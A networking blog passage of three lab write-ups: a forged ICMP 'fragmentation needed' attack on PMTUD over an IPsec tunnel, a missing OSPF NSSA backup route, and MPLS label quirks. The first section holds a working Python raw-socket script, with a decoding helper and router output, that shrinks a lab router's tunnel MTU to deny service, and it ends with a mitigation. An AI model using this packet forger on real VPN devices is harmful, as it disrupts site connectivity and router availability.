IPsec is a well-established technology for building VPN tunnels between sites. Path MTU discovery (PMTUD) is a feature that gives end hosts and VPN head ends visibility into the smallest MTU along the path so that they can adjust their own MTU accordingly. Is it possible to use the two features simultaneously? Sure, there is even an article from Cisco that walks a reader through the operation step by step. Should the two features be used simultaneously? That’s the question I would like to cover in this article.
IPsec VPNs are predominantly security-oriented – there are a number of features to ensure the CIA triad (confidentiality, integrity, availability). An IPsec device usually builds its tunnels over the Internet, so it has to withstand the attention of bad actors by design: the cost of the attack must be higher than the gain from it – that’s the idea that security is built upon. If you look closely at the description of PMTUD over IPsec, you will notice one peculiar aspect – the decision about a protected entity (the MTU of the IPsec tunnel) is based on completely arbitrary feedback from the intermediate network (ICMP fragmentation needed). Is it possible to craft an ICMP packet that would decrease the MTU to an unacceptably low value?
Here is the topology we will use today for testing:
Most of the routers are running a rather common IOS image for 7200 – 15.2(4)M11. VPN4, however, is a newer CSR1000v platform running IOS XE 16.9.3, and it is the device we will put under pressure. Attacker is an Ubuntu host that is going to forge ICMP replies. For the purpose of this lab both VPN head ends have PMTUD enabled. The real MTU restriction is on the link between VPN2 and ISP, so we will be able to validate PMTUD operation before meddling with VPN4. Here are the configuration lines for each of the devices:
H1#show run | section router|interface
interface Loopback0
ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.1 255.255.255.0
router ospf 1
network 0.0.0.0 255.255.255.255 area 0
VPN2#show run | section router|ip route|crypto|interface
crypto isakmp policy 10
authentication pre-share
crypto isakmp key cisco address 0.0.0.0
crypto ipsec transform-set SET esp-aes
mode tunnel
crypto ipsec profile PROFILE
set transform-set SET
interface Loopback0
ip address 2.2.2.2 255.255.255.255
interface Tunnel0
ip address 192.168.24.2 255.255.255.0
ip ospf mtu-ignore
tunnel source FastEthernet0/1
tunnel mode ipsec ipv4
tunnel destination 192.168.34.4
tunnel path-mtu-discovery
tunnel protection ipsec profile PROFILE
interface FastEthernet0/0
ip address 192.168.12.2 255.255.255.0
interface FastEthernet0/1
ip address 192.168.23.2 255.255.255.0
ip mtu 1400
ip ospf shutdown
router ospf 1
network 0.0.0.0 255.255.255.255 area 0
ip route 192.168.34.4 255.255.255.255 192.168.23.3
ISP#show run | section interface
interface Loopback0
ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
ip address 192.168.100.3 255.255.255.0
interface FastEthernet0/1
ip address 192.168.23.3 255.255.255.0
ip mtu 1400
interface FastEthernet1/0
ip address 192.168.34.3 255.255.255.0
VPN4#show run | section router|ip route|interface|crypto
crypto isakmp policy 10
authentication pre-share
crypto isakmp key cisco address 0.0.0.0
crypto ipsec transform-set SET esp-aes
mode tunnel
crypto ipsec profile PROFILE
set transform-set SET
interface Loopback0
ip address 4.4.4.4 255.255.255.255
interface Tunnel0
ip address 192.168.24.4 255.255.255.0
ip ospf mtu-ignore
tunnel source GigabitEthernet2
tunnel mode ipsec ipv4
tunnel destination 192.168.23.2
tunnel path-mtu-discovery
tunnel protection ipsec profile PROFILE
interface GigabitEthernet1
ip address 192.168.45.4 255.255.255.0
interface GigabitEthernet2
ip address 192.168.34.4 255.255.255.0
ip ospf shutdown
router ospf 1
network 0.0.0.0 255.255.255.255 area 0
ip route 192.168.23.2 255.255.255.255 192.168.34.3
H5#show run | section router|interface
interface Loopback0
ip address 5.5.5.5 255.255.255.255
interface FastEthernet0/0
ip address 192.168.45.5 255.255.255.0
router ospf 1
network 0.0.0.0 255.255.255.255 area 0
root@Attacker# tunctl -t tap0
root@Attacker# ifconfig tap0 192.168.100.10/24 up
root@Attacker# ip route add 192.168.34.0/24 via 192.168.100.3
Why is the ip ospf mtu-ignore command there on the tunnel interface? PMTUD is a unidirectional feature, so it is quite possible that one VPN head end has already decreased its MTU while its peer is only about to discover the restriction. If the OSPF adjacency is reset in such unfortunate circumstances, it cannot be restored by default because of the MTU mismatch in DBD packets.
Before we run any tests, let’s start the packet capture between ISP and VPN4 – our little emulation of the attacker’s reconnaissance. We’re interested only in ICMP packets at this point. PMTUD relies on packets with the DF bit set:
H5#ping 1.1.1.1 source 5.5.5.5 size 1400 df-bit
Type escape sequence to abort.
Sending 5, 1400-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5
Packet sent with the DF bit set
.M.M.
Success rate is 0 percent (0/5)
H5#
H5#ping 1.1.1.1 source 5.5.5.5 size 1300 df-bit
Type escape sequence to abort.
Sending 5, 1300-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5
Packet sent with the DF bit set
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 40/46/52 ms
VPN4#show interface tunnel 0
Tunnel0 is up, line protocol is up
<output omitted>
Tunnel protocol/transport IPSEC/IP
Tunnel TTL 255
Path MTU Discovery, ager 10 mins, min MTU 92, MTU 1342, expires 00:09:28
Tunnel transport MTU 1442 bytes
Tunnel transmit bandwidth 8000 (kbps)
Tunnel receive bandwidth 8000 (kbps)
Tunnel protection via IPSec (profile "PROFILE")
<output omitted>
Good news – PMTUD is indeed operational: tunnel MTU is decreased to 1342 bytes. Beware, though: older IOS software does not show the MTU value in use:
Note: This change in value is stored internally and cannot be seen in the output of the show ip interface tunnel<#> command. You only see this change if you turn use the debug tunnel command.
Remember that ICMP Fragmentation Needed carries a part of the offending packet, so we might need it to forge our own ICMP reply:
Only ESP headers are included in ICMP, so the Attacker can intercept the packets and infer SPI and Sequence values – that should be enough to construct a packet that looks and feels legitimate. However, our task is even simpler: it is enough to trick VPN4 into decreasing MTU value significantly. Since a good engineer is a lazy engineer, we could just copy the contents of an intercepted ICMP reply and modify it accordingly:
import socket
# Raw socket; IP_HDRINCL tells the kernel that we supply the IP header ourselves
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# Intercepted frame: Ethernet header (14 bytes), IP header, ICMP Fragmentation Needed
packet = bytearray(
    b"\x0c\x11\x72\x9e\x00\x01\xca\x03\x3c\xde\x00\x1c\x08\x00\x45\x00"
    b"\x00\x38\x00\x02\x00\x00\xff\x01\xf6\x6a\xc0\xa8\x22\x03\xc0\xa8"
    b"\x22\x04\x03\x04\xb2\x44\x00\x00\x05\x78\x45\x00\x05\xac\x04\xb3"
    b"\x40\x00\xfe\x32\xb8\x15\xc0\xa8\x22\x04\xc0\xa8\x17\x02\x5a\xe2"
    b"\xea\x4e\x00\x00\x00\x0e"
)
# Decrease MTU by 1024 bytes (0x04 in the high byte of the next-hop MTU field)
packet[2*16 + 8] = (packet[2*16 + 8] - 0x04) % 256
# Compute high byte of checksum word
hbyte = packet[2*16 + 4] + 0x04
# If high byte is overflown, compensate carryover
if hbyte > 255:
    packet[2*16 + 5] = packet[2*16 + 5] + 1
    hbyte -= 256
# Adjust high byte of checksum
packet[2*16 + 4] = hbyte
# Strip the Ethernet header: the raw socket expects the packet to start at the IP header
packet = packet[14:]
s.sendto(packet, ('192.168.34.4', 0))
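The byte offsets hard-coded in the script can be cross-checked by decoding the captured frame. Below is a minimal sketch that assumes the capture is exactly the Ethernet frame shown above; the helper names (`inet_checksum`, `decode`, `forge`) are made up for illustration and are not part of the original script. It also checks that the one-byte checksum patch gives the same result as recomputing the ICMP checksum from scratch.

```python
import struct

# The intercepted frame from the script above: Ethernet + IPv4 + ICMP.
FRAME = bytes.fromhex(
    "0c11729e0001ca033cde001c08004500"
    "003800020000ff01f66ac0a82203c0a8"
    "22040304b24400000578450005ac04b3"
    "4000fe32b815c0a82204c0a817025ae2"
    "ea4e0000000e"
)

ETH_LEN = 14  # Ethernet II header without a VLAN tag


def inet_checksum(data: bytes) -> int:
    """Internet checksum (RFC 1071) over data, padded to an even length."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def decode(frame: bytes) -> dict:
    """Pull out the fields the attack depends on."""
    ip = frame[ETH_LEN:]
    icmp = ip[(ip[0] & 0x0F) * 4:]          # skip the outer IP header
    icmp_type, code, checksum, _unused, mtu = struct.unpack("!BBHHH", icmp[:8])
    inner = icmp[8:]                         # quoted header of the offending packet
    esp = inner[(inner[0] & 0x0F) * 4:]      # first 8 bytes of ESP: SPI + sequence
    spi, seq = struct.unpack("!II", esp[:8])
    return {
        "type": icmp_type, "code": code, "checksum": checksum, "mtu": mtu,
        "inner_proto": inner[9], "spi": spi, "seq": seq, "icmp": icmp,
    }


def forge(frame: bytes, delta_high: int = 0x04) -> bytes:
    """Apply the same high-byte patch as the script, on a copy of the frame."""
    pkt = bytearray(frame)
    pkt[2 * 16 + 8] = (pkt[2 * 16 + 8] - delta_high) % 256
    hbyte = pkt[2 * 16 + 4] + delta_high
    if hbyte > 255:
        pkt[2 * 16 + 5] += 1
        hbyte -= 256
    pkt[2 * 16 + 4] = hbyte
    return bytes(pkt)


original = decode(FRAME)
forged = decode(forge(FRAME))
print(original["type"], original["code"], original["mtu"], hex(original["spi"]))
# A valid ICMP message sums to zero when the checksum field is included.
print(forged["mtu"], inet_checksum(forged["icmp"]) == 0)
```

The captured reply decodes as type 3, code 4 with a next-hop MTU of 1400, and the quoted inner header carries protocol 50 (ESP). After the patch the MTU field reads 376 and the checksum still validates.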
Checksum adjustment involves a bit of ancient magic in case of the carryover, though the idea itself is simple – decrease the high byte of the MTU while increasing the high byte of the checksum by the same amount. Quite straightforward, isn’t it? Let’s see whether it has any effect:
root@Attacker# python3 pckt.py
VPN4#show interfaces tunnel0
Tunnel0 is up, line protocol is up
<output omitted>
Tunnel protocol/transport IPSEC/IP
Tunnel TTL 255
Path MTU Discovery, ager 10 mins, min MTU 92, MTU 318, expires 00:09:48
Tunnel transport MTU 1442 bytes
Tunnel transmit bandwidth 8000 (kbps)
Tunnel receive bandwidth 8000 (kbps)
Tunnel protection via IPSec (profile "PROFILE")
<output omitted>
H5#ping 1.1.1.1 source 5.5.5.5 size 1300 df-bit
Type escape sequence to abort.
Sending 5, 1300-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5
Packet sent with the DF bit set
M.M.M
Success rate is 0 percent (0/5)
Evidently, the attack is successful. Implications? Well, for starters, packets with DF-bit cannot make it through, so the availability of VPN service is impacted. The regular packets would still get fragmented and sent over the IPsec tunnel. The fragmentation is always done by CPU though, so the spike of fragmented packets would result in CPU spike; in such a case router availability would be at risk, potentially denying the service altogether to the whole site.
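The MTU values in the show interface tunnel outputs are consistent with a constant 58-byte encapsulation overhead, and they also hint at how much extra work the router takes on. Here is a rough sketch of that arithmetic. It assumes that the router fragments clear-text packets to the tunnel MTU before encryption and that packets carry a 20-byte IPv4 header without options; the function names are illustrative only.

```python
import math

IPV4_HEADER = 20  # assumption: no IP options


def tunnel_mtu(path_mtu: int, overhead: int) -> int:
    """Tunnel MTU left after the encapsulation overhead is subtracted."""
    return path_mtu - overhead


def fragments_needed(packet_len: int, mtu: int) -> int:
    """Number of IPv4 fragments needed to fit packet_len into mtu."""
    if packet_len <= mtu:
        return 1
    payload = packet_len - IPV4_HEADER
    # Every fragment except the last carries a multiple of 8 payload bytes.
    per_fragment = (mtu - IPV4_HEADER) // 8 * 8
    return math.ceil(payload / per_fragment)


# Overhead observed in the lab: path MTU 1400 produced tunnel MTU 1342.
overhead = 1400 - 1342

print(overhead)
print(tunnel_mtu(376, overhead))      # forged next-hop MTU
print(fragments_needed(1300, 1342))   # before the attack
print(fragments_needed(1300, 318))    # after the attack
```

With the forged value in place, the same 1300-byte packet that used to fit into the tunnel unfragmented has to be split into several pieces, which is where the CPU load comes from.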
Is it a defect though? Unfortunately, it is not a bug to be fixed but a flaw in the feature design: the router has to trust unauthenticated packets from an arbitrary source within the transit network. Even if the ICMP reply included some part of the ESP payload covered by anti-replay protection, the ICV would most likely be omitted, so the ESP integrity check could not be performed. In the end, the only way to avoid such an attack is to disable PMTUD on the tunnel and configure the MTU manually. Luckily, most of the paths in the modern Internet can cope with the default MTU of 1500, so a static MTU for a tunnel should perform fine.
There are quite a few blog posts on the Internet explaining that a complex OSPF setup is usually more trouble than it’s worth. One of the quirks contributing to such overcomplication is the not-so-stubby area (NSSA). If you’re not yet convinced by the naming of the feature, take a look at this post by Ivan Pepelnjak. Still interested? I’ve got one more example for you that might steer your design decision towards BGP for complex scenarios.
Here is a sample topology:
Area 1 is NSSA, so both R1 and R2 are ABRs. R1 is also ASBR that redistributes 1.1.1.1/32 prefix. All links have default cost of 1 with a single exception – R1-R2 acts as backup so it has an increased cost of 10. Here is the basic config for such a setup:
R1#show run | section interface FastEthernet|router ospf|Loopback
interface Loopback0
ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.1 255.255.255.0
ip ospf 1 area 1
ip ospf cost 10
interface FastEthernet0/1
ip address 192.168.13.1 255.255.255.0
ip ospf 1 area 0
router ospf 1
router-id 1.1.1.1
area 1 nssa
redistribute connected subnets
R2#show run | section interface FastEthernet|router ospf|Loopback
interface Loopback0
ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.2 255.255.255.0
ip ospf 1 area 1
ip ospf cost 10
interface FastEthernet0/1
ip address 192.168.24.2 255.255.255.0
router ospf 1
router-id 2.2.2.2
area 1 nssa
network 0.0.0.0 255.255.255.255 area 0
R3#show run | section interface FastEthernet|router ospf|Loopback
interface Loopback0
ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
ip address 192.168.34.3 255.255.255.0
interface FastEthernet0/1
ip address 192.168.13.3 255.255.255.0
router ospf 1
router-id 3.3.3.3
network 0.0.0.0 255.255.255.255 area 0
R4#show run | section interface FastEthernet|router ospf|Loopback
interface Loopback0
ip address 4.4.4.4 255.255.255.255
interface FastEthernet0/0
ip address 192.168.34.4 255.255.255.0
interface FastEthernet0/1
ip address 192.168.24.4 255.255.255.0
router ospf 1
router-id 4.4.4.4
network 0.0.0.0 255.255.255.255 area 0
R4 should have two paths to 1.1.1.1/32:
the primary one through R3 due to LSA5, originated by R1;
the backup one through R2 due to LSA5, originated by R2 based on LSA7 contents.
However, that’s not the case:
R4#show ip os database | begin Type-5
Type-5 AS External Link States
Link ID ADV Router Age Seq# Checksum Tag
1.1.1.1 1.1.1.1 876 0x80000002 0x0099FD 0
Maybe the LSAs are considered functionally equivalent? Unlikely, since LSA5 from R1 should have lost to the competition (1.1.1.1 is lower than 2.2.2.2). Well, let’s check the connectivity first:
R4#traceroute 1.1.1.1 source 4.4.4.4
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.34.3 48 msec 44 msec 52 msec
2 192.168.13.1 44 msec 48 msec 48 msec
The primary path is definitely operational, so let’s take the R1–R3 link out of service and verify that the backup one kicks in properly:
R4#ping 1.1.1.1 source 4.4.4.4
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 4.4.4.4
.....
Success rate is 0 percent (0/5)
R4#
R4#show ip route 1.1.1.1
% Network not in table
As you can see, there is no backup route at all! There is a sickening void in the LSDB as well:
R4#show ip ospf database
OSPF Router with ID (4.4.4.4) (Process ID 1)
Router Link States (Area 0)
Link ID ADV Router Age Seq# Checksum Link count
1.1.1.1 1.1.1.1 1186 0x80000005 0x0092A2 1
2.2.2.2 2.2.2.2 1437 0x80000006 0x006991 2
3.3.3.3 3.3.3.3 90 0x80000007 0x0032A8 2
4.4.4.4 4.4.4.4 1293 0x80000004 0x00AD0A 3
Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
192.168.13.1 1.1.1.1 1186 0x80000004 0x00E8C2
192.168.24.2 2.2.2.2 1437 0x80000002 0x009FF5
192.168.34.3 3.3.3.3 1357 0x80000002 0x002B57
Summary Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
192.168.12.0 1.1.1.1 1446 0x80000002 0x009721
192.168.12.0 2.2.2.2 1437 0x80000003 0x00773C
Type-5 AS External Link States
Link ID ADV Router Age Seq# Checksum Tag
1.1.1.1 1.1.1.1 1446 0x80000002 0x0099FD 0
Note that LSAs from R1 are not flushed by other routers in the area. However, the graph is disjoint (there is no bidirectional edge between R1 and R3), so 1.1.1.1/32 is considered unreachable through R3. If you’d like more information on the OSPF graph computation process, check out this post. However, the main mystery is not solved yet.
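The bidirectional check is easy to picture with a toy model. The sketch below is a deliberate simplification: it collapses network LSAs into direct router-to-router edges, and the `CLAIMS` table is my own hypothetical reading of the area 0 LSDB after the failure, not something taken from the router.

```python
from collections import deque

# Hypothetical, simplified picture of area 0 after the failure: every router
# LSA is reduced to the set of neighbours that the router claims to have.
CLAIMS = {
    "R1": {"R3"},        # R1's LSA is still in the LSDB and still lists R3
    "R2": {"R4"},
    "R3": {"R4"},        # R3 no longer lists R1
    "R4": {"R2", "R3"},
}


def reachable(root, claims):
    """Breadth-first walk that follows a link only if both ends claim it."""
    seen = {root}
    queue = deque([root])
    while queue:
        node = queue.popleft()
        for peer in claims.get(node, set()):
            two_way = node in claims.get(peer, set())
            if two_way and peer not in seen:
                seen.add(peer)
                queue.append(peer)
    return seen


print(sorted(reachable("R4", CLAIMS)))
print(sorted(reachable("R1", CLAIMS)))
```

R1 never shows up in the tree rooted at R4, even though its LSAs are still sitting in the database, so anything it originates is unusable.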
There will be no salvation though: LSA5 will never get generated by R2 according to RFC 1587 (same holds true for RFC 3101 as well):
If a router is attached to another AS and is also an NSSA area border router, it may originate a both a type-5 and a type-7 LSA for the same network. The type-5 LSA will be flooded to the backbone (and all attached type-5 capable areas) and the type-7 will be flooded into the NSSA. If this is the case, the P-bit must be reset in the type-7 NSSA so the type-7 LSA isn’t again translated into a type-5 LSA by another NSSA area border router.
As you could have already guessed, that’s exactly our case (No Type 7/5 translation option):
R2#show ip ospf database nssa-external
OSPF Router with ID (2.2.2.2) (Process ID 1)
Type-7 AS External Link States (Area 1)
Routing Bit Set on this LSA in topology Base with MTID 0
LS age: 248
Options: (No TOS-capability, No Type 7/5 translation, DC, Upward)
LS Type: AS External Link
Link State ID: 1.1.1.1 (External Network Number )
Advertising Router: 1.1.1.1
LS Seq Number: 80000005
Checksum: 0x771B
Length: 36
Network Mask: /32
Metric Type: 2 (Larger than any link state path)
MTID: 0
Metric: 20
Forward Address: 0.0.0.0
External Route Tag: 0
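The translation rule boils down to a couple of checks on the Type-7 LSA. Here is a small sketch of that decision as I read RFC 3101: the LSA is a candidate for translation only if the P-bit is set and the forwarding address is non-zero. The Options value of 0x20 (DC only) is my assumption based on the Options line in the output above, and the function names are illustrative.

```python
# Bit positions of the OSPF Options field (RFC 2328 and RFC 3101).
OPTION_BITS = {0x02: "E", 0x04: "MC", 0x08: "N/P", 0x10: "EA", 0x20: "DC"}
P_BIT = 0x08


def decode_options(options):
    """Names of the option bits that are set, lowest bit first."""
    return [name for bit, name in sorted(OPTION_BITS.items()) if options & bit]


def is_translatable(options, forward_address):
    """A Type-7 LSA is translated only with the P-bit set and a non-zero FA."""
    return bool(options & P_BIT) and forward_address != "0.0.0.0"


# Assumption: Options = 0x20 (DC only), matching "No Type 7/5 translation, DC".
lsa_from_r1 = {"options": 0x20, "forward_address": "0.0.0.0"}

print(decode_options(lsa_from_r1["options"]))
print(is_translatable(**lsa_from_r1))
```

For the LSA in our lab both conditions fail, so R2 has nothing to translate.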
Conclusion? Don’t make the complex protocol even more complicated. If it’s an absolute must, then stick to the designs, published by vendors, test everything you can lay your hands on and don’t deviate from the two points above – vendor support and infrastructure availability are at stake here.
If you have ever worked with MPLS either in a lab or in production, you should have noticed that the technology itself is fairly straightforward. However, there are quite a few quirks that might make life more difficult than it has to be. Most of those peculiar aspects are extensively discussed in a multitude of posts on the net, but not all of them, unfortunately. Today I’d like to make a humble contribution to the knowledge base with a few lesser-known features that do not really warrant a separate post but are interesting nevertheless.
The topology is utterly straightforward:
MPLS is deployed within the ISP just for traffic encapsulation – no typical use case (L3VPN, TE, etc.) is active here. The IGP is vanilla OSPF, while the purpose of the several areas is to allow some minor routing manipulation on PEs. Below you can find the initial configs:
CE1#show run | section FastEthernet|router|Loopback
interface Loopback0
ip address 1.1.1.1 255.255.255.255
interface Loopback1
ip address 1.1.2.1 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.1 255.255.255.0
router ospf 1
router-id 1.1.1.1
network 0.0.0.0 255.255.255.255 area 1
PE1#show run | section FastEthernet|router|Loopback
interface Loopback0
ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
ip address 192.168.12.2 255.255.255.0
ip ospf 1 area 1
interface FastEthernet0/1
ip address 192.168.23.2 255.255.255.0
router ospf 1
mpls ldp autoconfig area 0
router-id 2.2.2.2
area 1 range 1.1.1.0 255.255.255.0
network 0.0.0.0 255.255.255.255 area 0
P#show run | section FastEthernet|router|Loopback
interface Loopback0
ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/1
ip address 192.168.23.3 255.255.255.0
interface FastEthernet1/0
ip address 192.168.34.3 255.255.255.0
router ospf 1
mpls ldp autoconfig
router-id 3.3.3.3
network 0.0.0.0 255.255.255.255 area 0
PE2#show run | section FastEthernet|router|Loopback
interface Loopback0
ip address 4.4.4.4 255.255.255.255
interface FastEthernet0/0
ip address 192.168.45.4 255.255.255.0
ip ospf 1 area 2
interface FastEthernet1/0
ip address 192.168.34.4 255.255.255.0
router ospf 1
mpls ldp autoconfig area 0
network 0.0.0.0 255.255.255.255 area 0
CE2#show run | section FastEthernet|router|Loopback
interface Loopback0
ip address 5.5.5.5 255.255.255.255
interface FastEthernet0/0
ip address 192.168.45.5 255.255.255.0
router ospf 1
router-id 5.5.5.5
network 0.0.0.0 255.255.255.255 area 2
Story 1: PHP confession
The theory behind penultimate hop popping (PHP) is widely known and described; here is a good recap if you feel rusty. However, most of the authors omit several important details to make the introduction to the topic easier.
Labels are allocated by LDP for all prefixes except the ones received from BGP. In the latter case BGP is the protocol responsible for label allocation, be it VPNv4 AF, labelled unicast or any other relevant application.
Although PHP removes a lookup in the general case, the implicit-null label applies only to connected and aggregated routes; transit routes are still allocated a regular label. The reason is simple: both connected and aggregated routes require a lookup anyway, while transit routes can be forwarded further based on the label.
Let’s verify that last statement in our lab:
CE2#show ip route ospf
<output omitted>
1.0.0.0/8 is variably subnetted, 2 subnets, 2 masks
O IA 1.1.1.0/24 [110/5] via 192.168.45.4, 00:07:20, FastEthernet0/0
O IA 1.1.2.1/32 [110/5] via 192.168.45.4, 00:05:26, FastEthernet0/0
2.0.0.0/32 is subnetted, 1 subnets
O IA 2.2.2.2 [110/4] via 192.168.45.4, 00:52:54, FastEthernet0/0
3.0.0.0/32 is subnetted, 1 subnets
O IA 3.3.3.3 [110/3] via 192.168.45.4, 00:52:54, FastEthernet0/0
4.0.0.0/32 is subnetted, 1 subnets
O IA 4.4.4.4 [110/2] via 192.168.45.4, 00:52:54, FastEthernet0/0
O IA 192.168.12.0/24 [110/4] via 192.168.45.4, 00:52:54, FastEthernet0/0
O IA 192.168.23.0/24 [110/3] via 192.168.45.4, 00:52:54, FastEthernet0/0
O IA 192.168.34.0/24 [110/2] via 192.168.45.4, 00:52:54, FastEthernet0/0
CE2#
CE2#traceroute 1.1.1.1 source 5.5.5.5
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.45.4 12 msec 12 msec 8 msec
2 192.168.34.3 [MPLS: Label 23 Exp 0] 48 msec 12 msec 32 msec
3 192.168.23.2 68 msec 36 msec 40 msec
4 192.168.12.1 76 msec 96 msec 44 msec
CE2#
CE2#traceroute 192.168.12.1 source 5.5.5.5
Type escape sequence to abort.
Tracing the route to 192.168.12.1
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.45.4 8 msec 16 msec 12 msec
2 192.168.34.3 [MPLS: Label 19 Exp 0] 12 msec 32 msec 28 msec
3 192.168.23.2 64 msec 44 msec 44 msec
4 192.168.12.1 56 msec 48 msec 60 msec
CE2#
CE2#traceroute 1.1.2.1 source 5.5.5.5
Type escape sequence to abort.
Tracing the route to 1.1.2.1
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.45.4 16 msec 20 msec 20 msec
2 192.168.34.3 [MPLS: Label 24 Exp 0] 52 msec 64 msec 56 msec
3 192.168.23.2 [MPLS: Label 23 Exp 0] 64 msec 48 msec 64 msec
4 192.168.12.1 100 msec 80 msec 84 msec
Note that the allocated labels are different due to per-prefix label allocation. Connected routes require a lookup, since it’s not possible to infer the next-hop and corresponding L2 information from the ingress label; the same is valid for the summary as well. The packet towards 1.1.2.1/32, however, can be forwarded to its next-hop immediately:
PE1#show mpls forwarding-table 1.1.1.0 24 detail
Local Outgoing Prefix Bytes Label Outgoing Next Hop
Label Label or Tunnel Id Switched interface
None No Label 1.1.1.0/24 0 punt
MAC/Encaps=0/0, MRU=0, Label Stack{}
No output feature configured
PE1#
PE1#show mpls forwarding-table 192.168.12.0 24 detail
Local Outgoing Prefix Bytes Label Outgoing Next Hop
Label Label or Tunnel Id Switched interface
None No Label 192.168.12.0/24 0 punt
MAC/Encaps=0/0, MRU=0, Label Stack{}
No output feature configured
PE1#
PE1#show mpls forwarding-table 1.1.2.1 32 detail
Local Outgoing Prefix Bytes Label Outgoing Next Hop
Label Label or Tunnel Id Switched interface
23 No Label 1.1.2.1/32 672 Fa0/0 192.168.12.1
MAC/Encaps=14/14, MRU=1504, Label Stack{}
CA010BDB0008CA020BDF00080800
No output feature configured
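The label behaviour observed in this story can be summarised in a few lines. This is only a sketch of the rule as described above, not of the actual LDP implementation; the route types and the label numbers produced by the allocator are hypothetical (the lab router happened to pick 23 for 1.1.2.1/32).

```python
import itertools

IMPLICIT_NULL = 3  # reserved label value defined in RFC 3032


def build_bindings(routes, first_label=16):
    """Map each prefix to the label a router would advertise for it."""
    allocator = itertools.count(first_label)
    bindings = {}
    for prefix, route_type in routes:
        if route_type in ("connected", "summary"):
            # A lookup is needed anyway, so ask the upstream router to pop.
            bindings[prefix] = IMPLICIT_NULL
        else:
            # Transit route: a real label lets the packet be switched onwards.
            bindings[prefix] = next(allocator)
    return bindings


PE1_ROUTES = [
    ("192.168.12.0/24", "connected"),
    ("1.1.1.0/24", "summary"),
    ("1.1.2.1/32", "ospf"),
]

print(build_bindings(PE1_ROUTES))
```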
Story 2: peculiar loopback
Another curious behaviour is connected with “misconfiguring” the loopback subnet mask. It is widely accepted that a loopback should have a /32 mask. Indeed, why waste precious address space? However, my hand has slipped several times and configured the familiar /24 mask in a lab. The consequences can be difficult to grasp and troubleshoot. Let’s make a change to our topology:
The reason for the outage is the absence of relevant label on P. It could be that the route is not propagating correctly:
P#show ip route 2.2.2.0 255.255.255.0 longer-prefixes
<output omitted>
2.0.0.0/32 is subnetted, 1 subnets
O 2.2.2.2 [110/2] via 192.168.23.2, 01:24:24, FastEthernet0/1
P#
P#show ip cef 2.2.2.2/32 detail
2.2.2.2/32, epoch 0
local label info: global/16
nexthop 192.168.23.2 FastEthernet0/1
No, it’s exactly as we’ve intended it to be, except for the lack of label in the CEF output. Labels are distributed by LDP, so let’s check what we receive from PE1 on P:
The label for 2.2.2.0/24 is correctly listed as implicit-null. Have you noticed anything off by now?
P#show ip route 2.2.2.0 255.255.255.0 longer-prefixes
<output omitted>
2.0.0.0/32 is subnetted, 1 subnets
O 2.2.2.2 [110/2] via 192.168.23.2, 01:30:17, FastEthernet0/1
P#
P#show mpls ldp bindings 2.2.2.0 24
lib entry: 2.2.2.0/24, rev 28
remote binding: lsr: 2.2.2.2:0, label: imp-null
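One way to read the two outputs above side by side is to model the RIB and the LIB as dictionaries keyed by exact prefix. This is only a sketch: the dictionaries are hand-copied from the outputs, and `outgoing_label` is a hypothetical helper that mimics the exact-match requirement between a route and a label binding.

```python
import ipaddress

# Hand-copied from the outputs on P.
rib = {ipaddress.ip_network("2.2.2.2/32"): "192.168.23.2"}
lib = {ipaddress.ip_network("2.2.2.0/24"): "imp-null"}


def outgoing_label(prefix, rib, lib):
    """Return the remote label for a RIB prefix, or None if no binding matches."""
    net = ipaddress.ip_network(prefix)
    if net not in rib:
        return None
    # The binding has to carry exactly the same prefix and mask as the route.
    return lib.get(net)


print(outgoing_label("2.2.2.2/32", rib, lib))
# Covering the address is not enough:
print(ipaddress.ip_address("2.2.2.2") in ipaddress.ip_network("2.2.2.0/24"))
```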
The subnet masks do not match! OSPF ignores non-host masks on loopbacks by default and announces loopback addresses as /32. However, LDP plays by the sensible rules and distributes the /24 as configured. P cannot match the prefix in the RIB to the binding in the LIB, hence the lack of an outgoing label. The fix is fairly simple if you have played with OSPF long enough:
Overlay VPN setups typically employ loopbacks as BGP next-hops. Besides obvious reasons like load-balancing, transport resiliency and such, there is a more stringent reason why one cannot use a physical interface as an L3VPN head end – PHP. Take our topology as an example. PE2, which is located one hop away from PE1, would not swap the transport label towards 192.168.23.2 for some value; it would pop it instead, because P announces implicit-null for its connected route.
PE2#traceroute 192.168.23.2 source 4.4.4.4
Type escape sequence to abort.
Tracing the route to 192.168.23.2
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.34.3 20 msec 24 msec 12 msec
2 192.168.23.2 8 msec 28 msec 24 msec
As a result, if it were L3VPN setup, P would receive the packet with VPN label on top, so it would either drop the packet or you might experience the most fascinating forwarding that Hogwarts can provide.
What if you cannot use a loopback for peering? To be honest, I cannot think of a valid reason for such a case, except for some weird CCIE lab, so this is purely an abstract discussion. Anyway, you must ensure that the PE1 interface IP is not recognized by P as directly connected. Newer IOS images do include a /32 in the RIB, called a Local route, but these routes are not announced by OSPF. However, OSPF does announce interface /32 addresses in a point-to-multipoint scenario:
